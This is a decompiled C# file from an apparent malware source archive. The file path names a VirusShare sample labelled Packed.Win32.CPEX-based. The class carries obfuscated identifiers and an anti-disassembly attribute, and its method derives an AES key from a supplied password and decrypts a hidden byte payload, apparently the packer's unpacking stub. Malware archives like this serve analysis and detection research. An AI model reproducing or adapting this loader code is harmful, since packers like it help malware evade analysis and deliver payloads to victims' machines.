MalwareSourceCode/MSIL/Packed/Win32/C/Packed.Win32.CPEX-based.ht-72f8bd90449e3c4875b681f4afb213e7bd866e6a0e1c08546770c7c21f92eed5/3.cs
2022-08-18 06:28:56 -05:00

29 lines
987 B
C#

// Decompiled with JetBrains decompiler
// Type: 3
// Assembly: syncui, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8C369EE2-0F8E-40F6-BD9C-ED440A7013AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Packed.Win32.CPEX-based.ht-72f8bd90449e3c4875b681f4afb213e7bd866e6a0e1c08546770c7c21f92eed5.exe
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
[SuppressIldasm]
internal sealed class \u0033 : \u007C
{
public \u0033()
{
if (false)
;
// ISSUE: explicit constructor call
base.\u002Ector();
}
public override object \u0040(params object[] _param1)
{
if (false)
;
Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes((string) _param1[1], new byte[8]);
return (object) new RijndaelManaged().CreateDecryptor(rfc2898DeriveBytes.GetBytes(32), rfc2898DeriveBytes.GetBytes(16)).TransformFinalBlock((byte[]) _param1[0], 0, ((byte[]) _param1[0]).Length);
}
}